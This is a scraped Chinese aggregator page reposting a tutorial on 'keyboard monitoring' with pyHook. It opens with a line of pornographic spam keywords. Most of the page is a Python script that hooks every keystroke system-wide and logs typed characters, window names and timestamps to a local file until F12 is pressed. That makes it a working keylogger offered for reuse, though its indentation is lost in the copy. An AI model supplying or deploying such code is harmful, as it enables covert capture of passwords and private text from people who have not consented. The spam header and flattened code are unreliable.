日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 >

python hook教程_python中使用pyhook实现键盘监控的例子

發布時間:2025/4/17 94 豆豆
生活随笔 收集整理的這篇文章主要介紹了 python hook教程_python中使用pyhook实现键盘监控的例子 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

# -*- coding: cp936 -*-

import pythoncom

import pyHook

import time

import win32api

t=''

asciistr=''

keystr=''

def onKeyboardEvent(event):

global t,asciistr,keystr

filename='d://test.txt'

wrfile=open(filename,'ab')

"處理鍵盤事件"

if t==str(event.WindowName):

asciistr=asciistr+chr(event.Ascii)

keystr=keystr+str(event.Key)

else:

t=str(event.WindowName)

if asciistr=='' and keystr=='':

wrfile.writelines("\nWindow:%s\n" % str(event.Window))

wrfile.writelines("WindowName:%s\n" % str(event.WindowName)) #寫入當前窗體名

wrfile.writelines("MessageName:%s\n" % str(event.MessageName))

wrfile.writelines("Message:%d\n" % event.Message)

wrfile.writelines("Time:%s\n" % time.strftime('%Y-%m-%d %H:%M:%S',time.localtime()))

else:

wrfile.writelines("Ascii_char:%s\n" %asciistr)

wrfile.writelines("Key_char:%s\n" %keystr)

wrfile.writelines("\nWindow:%s\n" % str(event.Window))

wrfile.writelines("WindowName:%s\n" % str(event.WindowName)) #寫入當前窗體名

wrfile.writelines("Time:%s\n" % time.strftime('%Y-%m-%d %H:%M:%S',time.localtime()))

asciistr=chr(event.Ascii)

keystr=str(event.Key)

if str(event.Key)=='F12': #按下F12后終止

wrfile.writelines("Ascii_char:%s\n" %asciistr)

wrfile.writelines("Key_char:%s\n" %keystr)

wrfile.close()

win32api.PostQuitMessage()

return True

if __name__ == "__main__":

#創建hook句柄

hm = pyHook.HookManager()

#監控鍵盤

hm.KeyDown = onKeyboardEvent

hm.HookKeyboard()

#循環獲取消息

pythoncom.PumpMessages(10000)

本文原創發布php中文網,轉載請注明出處,感謝您的尊重!

總結

以上是生活随笔為你收集整理的python hook教程_python中使用pyhook实现键盘监控的例子的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。